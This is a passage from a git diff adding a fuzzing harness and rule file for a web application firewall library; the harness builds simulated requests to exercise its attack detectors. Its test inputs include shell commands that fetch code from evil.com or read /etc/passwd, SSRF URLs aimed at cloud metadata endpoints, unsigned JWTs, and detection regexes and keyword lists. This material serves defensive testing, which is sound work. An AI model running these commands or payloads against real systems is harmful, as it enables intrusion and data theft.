-qO- http://evil.com/cmd) && eval $REPLY" // Complex shell expansion +}; +// Create shell command arrays to exercise shi_common.cpp +const std::vector> shell_commands = { + {"sh", "-c", "cat /etc/passwd", nullptr}, {"bash", "-c", "ls -la; whoami", nullptr}, + {"curl", "-o", "/tmp/shell.sh", "http://evil.com/backdoor", nullptr}, + {"wget", "-O", "/dev/null", "http://169.254.169.254/metadata", nullptr}}; + +// Generate URLs that trigger SSRF detector +const std::vector ssrf_urls = { + "http://169.254.169.254/latest/meta-data/", // AWS metadata + "http://127.0.0.1:8080/admin/config", // Local admin + "file:///etc/passwd", // File scheme + "ftp://internal.company.com/secrets/", // Internal FTP + "http://localhost:3306/mysql", // Database port + "gopher://127.0.0.1:25/", // Gopher protocol + "dict://localhost:11211/stats", // Dict protocol + "ldap://internal.ad.company.com/" // LDAP +}; + +// Generate IP addresses including some that match blocked IPs in rules_data +const std::vector ip_addresses = { + "192.168.1.100", // Matches blocked_ips data + "10.0.0.50", // Matches blocked_ips data + "127.0.0.1", // Localhost + "203.0.113.1", // Test IP + "198.51.100.1", // Test IP + "172.16.0.1", // Private IP + "10.0.0.1", // Private IP + "192.168.1.1" // Private IP +}; + +// Create SQL statements with database-specific syntax to exercise tokenizers +const std::vector sql_statements = { + "SELECT * FROM users WHERE id = $1 AND status = 'active'", // PostgreSQL style + "SELECT name FROM products WHERE price < ? LIMIT 10", // Generic/MySQL style + "INSERT INTO logs (message, created_at) VALUES (?, datetime('now'))", // SQLite style + "UPDATE accounts SET balance = balance + ? WHERE user_id = ?", // Generic + "DELETE FROM sessions WHERE expires_at < NOW()", // MySQL/PostgreSQL + "SELECT u.name, p.title FROM users u JOIN posts p ON u.id = p.user_id", // Complex join + "CREATE TABLE test (id INTEGER PRIMARY KEY, data TEXT)", // DDL + "DROP TABLE IF EXISTS temp_data" // DDL +}; + +// Cycle through different database types to exercise specific tokenizers +const std::vector db_types = { + "postgresql", // Triggers pgsql_tokenizer + "pgsql", // Alternative PostgreSQL trigger + "sqlite", // Triggers sqlite_tokenizer + "mysql", // Triggers mysql_tokenizer + "mysql2", // Alternative MySQL trigger + "oracle", // Triggers oracle tokenizer + "doctrine", // Triggers doctrine tokenizer + "hsqldb" // Triggers hsqldb tokenizer +}; + +const std::vector http_methods = { + "GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"}; + +const std::vector jwt_tokens = { + "signature", + "Bearer " + "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9." + "eyJhdWQiOiIxIiwianRpIjoiYWJjZGVmZ2hpaiIsImlhdCI6MTYxNjE2MTYxNiwiZXhwIjoxNjE2MTY1MjE2fQ." + "eyJhbGciOiJSUzM4NCIsInR5cCI6IkpXVCJ9." + "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.signature_rs384", + "eyJyb2xlIjoiYWRtaW4iLCJ1c2VyIjoiYWRtaW4iLCJleHAiOjE2MTYxNjUyMTZ9.admin_token", + "Bearer eyJhbGciOiJIUzI1NiJ9.invalid", + "Bearer malformed_token_no_dots", + "Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIn0.", + "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9." + "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ." + "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c", +}; + +const std::vector http_headers_keys = { + "Content-Type", + "Host", + "User-Agent", + "Accept", + "Accept-Encoding", + "Accept-Language", + "Accept-Charset", + "Connection", +}; + +const std::vector http_headers_values = { + "application/json", + "application/x-www-form-urlencoded", + "multipart/form-data", + "text/plain", + "application/octet-stream", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "application/json,text/html", + "gzip,deflate", + "en-US,en;q=0.9", + "utf-8", + "keep-alive", +}; + +// Cookie key-value pairs to exercise normalize_key and normalize_value functions +const std::vector> cookie_pairs = { + {"session_id", "1234567890"}, {"user_id", "9876543210"}, + {"theme", "dark,mode"}, // Contains comma to test normalize_value escaping + {"CSRF_TOKEN", "ABC,DEF=GHI"}, // Mixed case and special chars for normalize_key + {"preferences", "lang=en,theme=dark"}, // Nested comma values + {"User-Agent", "Mozilla/5.0"}, // Dash in key name + {"api_key", "key,with,commas"}, // Multiple commas to test escaping + {"auth_token", "bearer_token_123"}, {"cart_items", "item1,item2,item3"}, // Array-like values + {"notification,settings", "enabled"}, // Comma in key name to test normalize_key +}; + +const std::vector query_params = { + "page=1", + "page=1&limit=10", + "page=1&limit=10&sort=name", + "page=1&limit=10&sort=name&order=asc", + "page=1&limit=10&sort=name&order=asc&filter=active", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc&page=2", + "page=1&limit=10&sort=name&order=asc&filter=active&search=john&sort=email&order=desc&page=2&" + "limit=20", +}; + +const std::vector user_ids = { + "1234567890", + "1234567890", +}; + +const std::vector session_ids = { + "1234567890", + "1234567890", +}; + +const std::vector custom_resources_names = { + "server.io.fs.file", + "server.request.query", + "server.request.body", + "server.request.uri_raw", + "server.request.headers", + "server.request.uri.raw", + "server.request.params", + "server.request.cookies", + "server.request.trailers", + "server.request.path_params", + "server.request.method", + "server.request.headers.no_cookies", + "server.io.net.url", + "server.db.statement", + "server.db.system", + "http.client_ip", + "grpc.server.method", + "grpc.server.request.message", + "grpc.server.request.metadata", +}; + +// Helper to create a request object from input data +ddwaf_object create_request_object(InputSplitter &splitter) +{ + ddwaf_object root, tmp; + ddwaf_object_map(&root); + + // Use first byte to determine request structure type + uint8_t request_type = splitter.get() % 6; + + switch (request_type) { + case 0: { + // HTTP request structure + auto uri_index = splitter.get(); + auto uri = splitter.get_string(); + + auto query_index = splitter.get(); + auto query = splitter.get_string(); + + auto body_type = splitter.get(); + auto body = splitter.get_string(); + + auto method_index = splitter.get(); + auto method = splitter.get_string(); + + auto jwt_index = splitter.get(); + + if (uri_index < attack_uris.size()) { + // Generate URI patterns that trigger security detectors + const char *selected_uri = attack_uris[uri_index]; + ddwaf_object_map_addl(&root, "server.request.uri_raw", 22, + ddwaf_object_stringl(&tmp, selected_uri, strlen(selected_uri))); + } else { + // Use the URI string directly as fallback + ddwaf_object_map_addl(&root, "server.request.uri_raw", 22, + ddwaf_object_stringl(&tmp, uri.data(), uri.size())); + } + + if (query_index < attack_queries.size()) { + // Generate query patterns for security detectors with complex shell tokenization + const char *selected_query = attack_queries[query_index]; + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, selected_query, strlen(selected_query))); + } else { + // Use the query string directly as fallback + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, query.data(), query.size())); + } + + // Create complex nested structures for extract_schema processor + switch (body_type) { + case 0: { + // Complex nested object structure for schema extraction + ddwaf_object body_obj, data_obj, user_obj, profile_obj, settings_obj, metadata_obj; + ddwaf_object name_tmp, email_tmp, age_tmp, active_tmp, theme_tmp, lang_tmp; + ddwaf_object version_tmp, timestamp_tmp, null_tmp, float_tmp, permissions_array; + + ddwaf_object_map(&body_obj); + ddwaf_object_map(&data_obj); + ddwaf_object_map(&user_obj); + ddwaf_object_map(&profile_obj); + ddwaf_object_map(&settings_obj); + ddwaf_object_map(&metadata_obj); + ddwaf_object_array(&permissions_array); + + // Create diverse data types for comprehensive schema analysis + ddwaf_object_map_addl( + &profile_obj, "name", 4, ddwaf_object_stringl(&name_tmp, "John Doe", 8)); + ddwaf_object_map_addl( + &profile_obj, "email", 5, ddwaf_object_stringl(&email_tmp, "john@example.com", 16)); + ddwaf_object_map_addl(&profile_obj, "age", 3, ddwaf_object_signed(&age_tmp, 30)); + ddwaf_object_map_addl(&profile_obj, "active", 6, ddwaf_object_bool(&active_tmp, true)); + ddwaf_object_map_addl(&profile_obj, "score", 5, ddwaf_object_float(&float_tmp, 95.7)); + ddwaf_object_map_addl(&profile_obj, "deprecated", 10, ddwaf_object_null(&null_tmp)); + + ddwaf_object_map_addl( + &settings_obj, "theme", 5, ddwaf_object_stringl(&theme_tmp, "dark", 4)); + ddwaf_object_map_addl( + &settings_obj, "language", 8, ddwaf_object_stringl(&lang_tmp, "en", 2)); + + // Add metadata with various types for deeper schema extraction + ddwaf_object_map_addl( + &metadata_obj, "version", 7, ddwaf_object_stringl(&version_tmp, "2.1.0", 5)); + ddwaf_object_map_addl( + &metadata_obj, "timestamp", 9, ddwaf_object_unsigned(×tamp_tmp, 1640995200)); + + // Create permissions array for array schema extraction + ddwaf_object perm1, perm2, perm3; + ddwaf_object_stringl(&perm1, "read", 4); + ddwaf_object_stringl(&perm2, "write", 5); + ddwaf_object_stringl(&perm3, "admin", 5); + ddwaf_object_array_add(&permissions_array, &perm1); + ddwaf_object_array_add(&permissions_array, &perm2); + ddwaf_object_array_add(&permissions_array, &perm3); + + ddwaf_object_map_addl(&user_obj, "profile", 7, &profile_obj); + ddwaf_object_map_addl(&user_obj, "settings", 8, &settings_obj); + ddwaf_object_map_addl(&user_obj, "permissions", 11, &permissions_array); + ddwaf_object_map_addl(&data_obj, "user", 4, &user_obj); + ddwaf_object_map_addl(&data_obj, "metadata", 8, &metadata_obj); + ddwaf_object_map_addl(&body_obj, "data", 4, &data_obj); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 1: { + // Complex array structure for schema extraction + ddwaf_object body_obj, items_array, products_array, nested_obj; + ddwaf_object item1, item2, item3, product1, product2; + ddwaf_object id1_tmp, name1_tmp, id2_tmp, name2_tmp, id3_tmp, name3_tmp; + ddwaf_object price1_tmp, price2_tmp, available1_tmp, available2_tmp; + ddwaf_object category_tmp, tags_array, tag1, tag2; + + ddwaf_object_map(&body_obj); + ddwaf_object_array(&items_array); + ddwaf_object_array(&products_array); + ddwaf_object_array(&tags_array); + ddwaf_object_map(&item1); + ddwaf_object_map(&item2); + ddwaf_object_map(&item3); + ddwaf_object_map(&product1); + ddwaf_object_map(&product2); + ddwaf_object_map(&nested_obj); + + // Create array items with different structures and types + ddwaf_object_map_addl(&item1, "id", 2, ddwaf_object_signed(&id1_tmp, 1)); + ddwaf_object_map_addl(&item1, "name", 4, ddwaf_object_stringl(&name1_tmp, "item1", 5)); + + ddwaf_object_map_addl(&item2, "id", 2, ddwaf_object_signed(&id2_tmp, 2)); + ddwaf_object_map_addl(&item2, "name", 4, ddwaf_object_stringl(&name2_tmp, "item2", 5)); + + ddwaf_object_map_addl(&item3, "id", 2, ddwaf_object_signed(&id3_tmp, 3)); + ddwaf_object_map_addl(&item3, "name", 4, ddwaf_object_stringl(&name3_tmp, "item3", 5)); + + // Create products with mixed data types for schema diversity + ddwaf_object_map_addl(&product1, "price", 5, ddwaf_object_float(&price1_tmp, 29.99)); + ddwaf_object_map_addl( + &product1, "available", 9, ddwaf_object_bool(&available1_tmp, true)); + ddwaf_object_map_addl(&product2, "price", 5, ddwaf_object_float(&price2_tmp, 49.99)); + ddwaf_object_map_addl( + &product2, "available", 9, ddwaf_object_bool(&available2_tmp, false)); + + // Create nested tags array + ddwaf_object_stringl(&tag1, "electronics", 11); + ddwaf_object_stringl(&tag2, "gadgets", 7); + ddwaf_object_array_add(&tags_array, &tag1); + ddwaf_object_array_add(&tags_array, &tag2); + + ddwaf_object_array_add(&items_array, &item1); + ddwaf_object_array_add(&items_array, &item2); + ddwaf_object_array_add(&items_array, &item3); + + ddwaf_object_array_add(&products_array, &product1); + ddwaf_object_array_add(&products_array, &product2); + + ddwaf_object_map_addl( + &nested_obj, "category", 8, ddwaf_object_stringl(&category_tmp, "shopping", 8)); + ddwaf_object_map_addl(&nested_obj, "tags", 4, &tags_array); + + ddwaf_object_map_addl(&body_obj, "items", 5, &items_array); + ddwaf_object_map_addl(&body_obj, "products", 8, &products_array); + ddwaf_object_map_addl(&body_obj, "metadata", 8, &nested_obj); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 2: { + // Shell command array structure for shi_common.cpp coverage + ddwaf_object body_obj, cmd_array; + ddwaf_object cmd_part; + + ddwaf_object_map(&body_obj); + ddwaf_object_array(&cmd_array); + + auto cmd_set = splitter.get() % shell_commands.size(); + const auto &selected_cmd = shell_commands[cmd_set]; + for (int i = 0; i < selected_cmd.size(); i++) { + if (selected_cmd[i] != NULL) { + ddwaf_object_stringl(&cmd_part, selected_cmd[i], strlen(selected_cmd[i])); + ddwaf_object_array_add(&cmd_array, &cmd_part); + } + } + + ddwaf_object_map_addl(&body_obj, "command", 7, &cmd_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 3: { + // Deep nested structure to test extract_schema max_container_depth limits + ddwaf_object body_obj, level1, level2, level3, level4, level5, level6, level7, level8, + level9, level10; + ddwaf_object level11, level12, level13, level14, level15, level16, level17, level18, + level19, level20; + ddwaf_object deep_value, mixed_array, array_item1, array_item2; + + ddwaf_object_map(&body_obj); + ddwaf_object_map(&level1); + ddwaf_object_map(&level2); + ddwaf_object_map(&level3); + ddwaf_object_map(&level4); + ddwaf_object_map(&level5); + ddwaf_object_map(&level6); + ddwaf_object_map(&level7); + ddwaf_object_map(&level8); + ddwaf_object_map(&level9); + ddwaf_object_map(&level10); + ddwaf_object_map(&level11); + ddwaf_object_map(&level12); + ddwaf_object_map(&level13); + ddwaf_object_map(&level14); + ddwaf_object_map(&level15); + ddwaf_object_map(&level16); + ddwaf_object_map(&level17); + ddwaf_object_map(&level18); + ddwaf_object_map(&level19); + ddwaf_object_map(&level20); + ddwaf_object_array(&mixed_array); + ddwaf_object_map(&array_item1); + ddwaf_object_map(&array_item2); + + // Create very deep nesting that exceeds max_container_depth (18) + ddwaf_object_stringl(&deep_value, "deep_nested_value", 17); + ddwaf_object_map_addl(&level20, "final", 5, &deep_value); + ddwaf_object_map_addl(&level19, "level20", 7, &level20); + ddwaf_object_map_addl(&level18, "level19", 7, &level19); + ddwaf_object_map_addl(&level17, "level18", 7, &level18); + ddwaf_object_map_addl(&level16, "level17", 7, &level17); + ddwaf_object_map_addl(&level15, "level16", 7, &level16); + ddwaf_object_map_addl(&level14, "level15", 7, &level15); + ddwaf_object_map_addl(&level13, "level14", 7, &level14); + ddwaf_object_map_addl(&level12, "level13", 7, &level13); + ddwaf_object_map_addl(&level11, "level12", 7, &level12); + ddwaf_object_map_addl(&level10, "level11", 7, &level11); + ddwaf_object_map_addl(&level9, "level10", 7, &level10); + ddwaf_object_map_addl(&level8, "level9", 6, &level9); + ddwaf_object_map_addl(&level7, "level8", 6, &level8); + ddwaf_object_map_addl(&level6, "level7", 6, &level7); + ddwaf_object_map_addl(&level5, "level6", 6, &level6); + ddwaf_object_map_addl(&level4, "level5", 6, &level5); + ddwaf_object_map_addl(&level3, "level4", 6, &level4); + ddwaf_object_map_addl(&level2, "level3", 6, &level3); + ddwaf_object_map_addl(&level1, "level2", 6, &level2); + + // Add array items to test array limits + ddwaf_object array_val1, array_val2; + ddwaf_object_map_addl(&array_item1, "id", 2, ddwaf_object_signed(&array_val1, 1)); + ddwaf_object_map_addl(&array_item2, "id", 2, ddwaf_object_signed(&array_val2, 2)); + ddwaf_object_array_add(&mixed_array, &array_item1); + ddwaf_object_array_add(&mixed_array, &array_item2); + + ddwaf_object_map_addl(&body_obj, "deep_structure", 14, &level1); + ddwaf_object_map_addl(&body_obj, "mixed_array", 11, &mixed_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + default: { + // Simple body structure + ddwaf_object_map_addl(&root, "server.request.body", 19, + ddwaf_object_stringl(&tmp, body.data(), body.size())); + break; + } + } + + if (method_index < http_methods.size()) { + const char *selected_method = http_methods[method_index]; + ddwaf_object_map_addl(&root, "server.request.method", 21, + ddwaf_object_stringl(&tmp, selected_method, strlen(selected_method))); + } else { + // Use the method string directly as fallback + ddwaf_object_map_addl(&root, "server.request.method", 21, + ddwaf_object_stringl(&tmp, method.data(), method.size())); + } + + // Add Authorization header with JWT token for jwt_decode processor + ddwaf_object headers_obj, auth_tmp; + ddwaf_object_map(&headers_obj); + + if (jwt_index < jwt_tokens.size()) { + const char *selected_jwt = jwt_tokens[jwt_index]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, selected_jwt, strlen(selected_jwt))); + } else { + // Use a default JWT token + const char *default_jwt = jwt_tokens[0]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, default_jwt, strlen(default_jwt))); + } + + ddwaf_object_map_addl(&root, "server.request.headers.no_cookies", 33, &headers_obj); + + // Add cookies to exercise session_fingerprint and kv_hash_fields + ddwaf_object cookies_obj; + ddwaf_object_map(&cookies_obj); + auto cookie_idx = splitter.get() % cookie_pairs.size(); + const auto &[key, value] = cookie_pairs[cookie_idx]; + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, key, strlen(key), + ddwaf_object_stringl(&cookie_value, value, strlen(value))); + ddwaf_object_map_addl(&root, "server.request.cookies", 22, &cookies_obj); + + // Add session and user data + auto session_idx = splitter.get() % session_ids.size(); + auto user_idx = splitter.get() % user_ids.size(); + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, session_ids[session_idx], strlen(session_ids[session_idx]))); + ddwaf_object_map_addl(&root, "usr.id", 6, + ddwaf_object_stringl(&tmp, user_ids[user_idx], strlen(user_ids[user_idx]))); + + break; + } + case 1: { + // Network/IP focused structure + auto ip_index = splitter.get(); + auto url_index = splitter.get(); + auto client_ip = splitter.get_string(); + auto url = splitter.get_string(); + + if (ip_index < ip_addresses.size()) { + const char *selected_ip = ip_addresses[ip_index]; + ddwaf_object_map_addl(&root, "http.client_ip", 14, + ddwaf_object_stringl(&tmp, selected_ip, strlen(selected_ip))); + } else { + // Use the client_ip string directly as fallback + ddwaf_object_map_addl(&root, "http.client_ip", 14, + ddwaf_object_stringl(&tmp, client_ip.data(), client_ip.size())); + } + + if (url_index < ssrf_urls.size()) { + const char *selected_url = ssrf_urls[url_index]; + ddwaf_object_map_addl(&root, "server.io.net.url", 17, + ddwaf_object_stringl(&tmp, selected_url, strlen(selected_url))); + } else { + // Use the url string directly as fallback + ddwaf_object_map_addl( + &root, "server.io.net.url", 17, ddwaf_object_stringl(&tmp, url.data(), url.size())); + } + break; + } + case 2: { + // Database focused structure + auto db_statement_index = splitter.get(); + auto db_type_index = splitter.get(); + auto db_system = splitter.get_string(); + auto query_param_index = splitter.get(); + auto query_param = splitter.get_string(); + + if (db_statement_index < sql_statements.size()) { + const char *selected_sql = sql_statements[db_statement_index]; + ddwaf_object_map_addl(&root, "server.db.statement", 19, + ddwaf_object_stringl(&tmp, selected_sql, strlen(selected_sql))); + } else { + // Use the db_system string directly as fallback + ddwaf_object_map_addl(&root, "server.db.statement", 19, + ddwaf_object_stringl(&tmp, db_system.data(), db_system.size())); + } + + if (db_type_index < db_types.size()) { + const char *selected_db = db_types[db_type_index]; + ddwaf_object_map_addl(&root, "server.db.system", 16, + ddwaf_object_stringl(&tmp, selected_db, strlen(selected_db))); + } else { + // Use the db_system string directly as fallback + ddwaf_object_map_addl(&root, "server.db.system", 16, + ddwaf_object_stringl(&tmp, db_system.data(), db_system.size())); + } + + if (query_param_index < query_params.size()) { + const char *selected_query_param = query_params[query_param_index]; + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, selected_query_param, strlen(selected_query_param))); + } else { + // Use the query_param string directly as fallback + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, query_param.data(), query_param.size())); + } + break; + } + case 3: { + // Headers, cookies, and user session structure + auto headers_key_index = splitter.get(); + auto headers_value_index = splitter.get(); + auto headers = splitter.get_string(); + + auto cookies_index = splitter.get(); + auto cookies = splitter.get_string(); + + auto session_id_index = splitter.get(); + auto session_id = splitter.get_string(); + + auto user_id_index = splitter.get(); + auto user_id = splitter.get_string(); + + auto jwt_index = splitter.get(); + auto jwt = splitter.get_string(); + + ddwaf_object headers_obj, cookies_obj; + ddwaf_object_map(&headers_obj); + // cookies_obj will be initialized later as a proper map + + if (headers_key_index < sizeof(http_headers_keys) / sizeof(http_headers_keys[0]) && + headers_value_index < sizeof(http_headers_values) / sizeof(http_headers_values[0])) { + const char *selected_headers_key = http_headers_keys[headers_key_index]; + const char *selected_headers_value = http_headers_values[headers_value_index]; + ddwaf_object_map_addl(&headers_obj, selected_headers_key, strlen(selected_headers_key), + ddwaf_object_stringl(&tmp, selected_headers_value, strlen(selected_headers_value))); + + } else { + // Use the headers string directly as fallback + ddwaf_object_map_addl(&headers_obj, "content-type", 12, + ddwaf_object_stringl(&tmp, headers.data(), headers.size())); + } + + // Add Authorization header with JWT token for jwt_decode processor + ddwaf_object auth_tmp; + if (jwt_index < jwt_tokens.size()) { + const char *selected_jwt = jwt_tokens[jwt_index]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, selected_jwt, strlen(selected_jwt))); + } else { + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, jwt.data(), jwt.size())); + } + + // Create cookies as a proper key-value map to exercise kv_hash_fields + ddwaf_object_map(&cookies_obj); + if (cookies_index < cookie_pairs.size()) { + // Use predefined cookie pairs that exercise normalize_key/normalize_value + auto num_cookies = (cookies_index % 3) + 1; // 1-3 cookies + for (int i = 0; i < num_cookies && (cookies_index + i) < cookie_pairs.size(); i++) { + const auto &[key, value] = cookie_pairs[cookies_index + i]; + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, key, strlen(key), + ddwaf_object_stringl(&cookie_value, value, strlen(value))); + } + } else { + // Create a fallback cookie from fuzz data + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, "fuzz_cookie", 11, + ddwaf_object_stringl(&cookie_value, cookies.data(), cookies.size())); + } + + // Add session_id and user_id directly to root (they are string values, not maps) + if (session_id_index < session_ids.size()) { + const char *selected_session_id = session_ids[session_id_index]; + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, selected_session_id, strlen(selected_session_id))); + } else { + // Use the session_id string directly as fallback + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, session_id.data(), session_id.size())); + } + + if (user_id_index < user_ids.size()) { + const char *selected_user_id = user_ids[user_id_index]; + ddwaf_object_map_addl(&root, "usr.id", 6, + ddwaf_object_stringl(&tmp, selected_user_id, strlen(selected_user_id))); + } else { + // Use the user_id string directly as fallback + ddwaf_object_map_addl( + &root, "usr.id", 6, ddwaf_object_stringl(&tmp, user_id.data(), user_id.size())); + } + + ddwaf_object_map_addl(&root, "server.request.headers", 20, &headers_obj); + ddwaf_object_map_addl(&root, "server.request.cookies", 22, &cookies_obj); + break; + } + case 4: { + // Large array structure to test extract_schema max_array_nodes limits + auto large_array_size = splitter.get() % 20 + 5; // 5-24 items + + ddwaf_object body_obj, large_array, headers_obj, auth_tmp; + ddwaf_object_map(&body_obj); + ddwaf_object_array(&large_array); + ddwaf_object_map(&headers_obj); + + // Create a large array that exceeds max_array_nodes (10) + for (int i = 0; i < large_array_size; i++) { + auto data = splitter.get_string(); + ddwaf_object item, id_tmp, data_tmp; + ddwaf_object_map(&item); + ddwaf_object_map_addl(&item, "id", 2, ddwaf_object_signed(&id_tmp, i)); + ddwaf_object_map_addl( + &item, "data", 4, ddwaf_object_stringl(&data_tmp, data.data(), data.size())); + ddwaf_object_array_add(&large_array, &item); + } + + ddwaf_object_map_addl(&body_obj, "large_collection", 16, &large_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 5: { + ddwaf_object resource_obj; + ddwaf_object_map(&resource_obj); + // Hard generator of random resources + auto custom_resource_index = splitter.get(); + auto custom_resource_name = splitter.get_string(); + + // We don't set a default set of values, we let the fuzzer generate it. + auto custom_resource_value = splitter.get_string(); + + if (custom_resource_index < custom_resources_names.size()) { + const char *selected_custom_resource_name = + custom_resources_names[custom_resource_index]; + ddwaf_object_map_addl(&resource_obj, selected_custom_resource_name, + strlen(selected_custom_resource_name), + ddwaf_object_stringl( + &tmp, custom_resource_value.data(), custom_resource_value.size())); + } else { + // Use the custom_resource_name string directly as fallback + ddwaf_object_map_addl(&resource_obj, custom_resource_name.data(), + custom_resource_name.size(), + ddwaf_object_stringl( + &tmp, custom_resource_value.data(), custom_resource_value.size())); + } + ddwaf_object_map_addl(&root, "server.request.headers", 20, &resource_obj); + break; + } + } + + return root; +} + +// Initialize WAF with simple_rules.json configuration +// This is done only once because the ruleset is static for a fuzzer, but is very costly to load. +ddwaf_handle initialize_waf() +{ + try { + // Use the simple_rules.json configuration for better coverage + std::string json_string{embedded_configs::simple_rules_json}; + ddwaf_object ruleset = json_to_object(json_string); + + // Initialize WAF + ddwaf_config config{{0, 0, 0}, {nullptr, nullptr}, ddwaf_object_free}; + ddwaf_object diagnostics; + ddwaf_handle handle = ddwaf_init(&ruleset, &config, &diagnostics); + + ddwaf_object_free(&ruleset); + ddwaf_object_free(&diagnostics); + + if (handle == nullptr) { + // WAF initialization failed - crash + __builtin_trap(); + } + + return handle; + } catch (...) { + // Rule loading failed - crash immediately + __builtin_trap(); + } +} + +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + + // Initialize WAF once with simple_rules.json + g_waf_handle = initialize_waf(); + if (g_waf_handle == nullptr) { + // WAF initialization failed - crash + __builtin_trap(); + } + + // Initialize global context once for reuse across all test cases + g_waf_context = ddwaf_context_init(g_waf_handle); + if (g_waf_context == nullptr) { + // Context initialization failed - crash + __builtin_trap(); + } + + // Exercise ddwaf_known_addresses and ddwaf_known_actions API functions + uint32_t addresses_size = 0; + const char *const *addresses = ddwaf_known_addresses(g_waf_handle, &addresses_size); + prevent_optimization(addresses); + prevent_optimization(addresses_size); + + uint32_t actions_size = 0; + const char *const *actions = ddwaf_known_actions(g_waf_handle, &actions_size); + prevent_optimization(actions); + prevent_optimization(actions_size); + + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + // Limit payload size to 128KB to prevent excessive memory usage + constexpr size_t MAX_PAYLOAD_SIZE = 128 * 1024; + if (size > MAX_PAYLOAD_SIZE || size < 3) { + return 0; + } + + InputSplitter splitter(data, size); + + uint8_t fuzz_mode = splitter.get() % 2; + switch (fuzz_mode) { + case 0: { + ddwaf_object request = create_request_object(splitter); + ddwaf_object result; + ddwaf_object_invalid(&result); // Initialize result object + + uint64_t timeout = 5000; // 5ms timeout for deeper exploration + DDWAF_RET_CODE code = ddwaf_run(g_waf_context, nullptr, &request, &result, timeout); + + ddwaf_object_free(&result); + prevent_optimization(code); + break; + } + case 1: { + uint8_t num_requests = (splitter.get() % 20) + 1; // 1-20 requests + for (uint8_t i = 0; i < num_requests && splitter.has_data(); i++) { + ddwaf_object request = create_request_object(splitter); + ddwaf_object result; + ddwaf_object_invalid(&result); // Initialize result object + + uint64_t timeout = 5000; // 5ms timeout + DDWAF_RET_CODE code = ddwaf_run(g_waf_context, nullptr, &request, &result, timeout); + + ddwaf_object_free(&result); + prevent_optimization(code); + } + + break; + } + default: { + // It shouldn't be possible to end up here, so crashing explicitly + __builtin_trap(); + } + } + + return 0; +} + +// Custom cleanup function for when the fuzzer process exits +__attribute__((destructor)) static void cleanup_waf() +{ + if (g_waf_context != nullptr) { + ddwaf_context_destroy(g_waf_context); + g_waf_context = nullptr; + } + if (g_waf_handle != nullptr) { + ddwaf_destroy(g_waf_handle); + g_waf_handle = nullptr; + } +} + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("e2e_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/e2e/src/ruleset/simple_rules.json b/fuzzer/e2e/src/ruleset/simple_rules.json new file mode 100644 index 000000000..37fe888d0 --- /dev/null +++ b/fuzzer/e2e/src/ruleset/simple_rules.json @@ -0,0 +1,1716 @@ +{ + "version": "2.2", + "rules": [ + { + "id": "basic-regex-rule", + "name": "Basic regex matching rule", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "match_regex", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "regex": "(?i)(union.*select|select.*from|insert.*into|delete.*from|drop.*table|script.*alert|javascript:|vbscript:|onload=|onerror=|eval\\(|setTimeout\\()" + } + } + ], + "transformers": ["lowercase", "url_decode"], + "on_match": ["block"] + }, + { + "id": "phrase-match-rule", + "name": "Phrase matching with Aho-Corasick", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "admin", + "root", + "passwd", + "shadow", + "config", + "backup", + "database", + "mysql", + "postgresql", + "oracle", + "mongodb", + "redis", + "memcached", + "elasticsearch", + "secret", + "token", + "key", + "password", + "credential", + 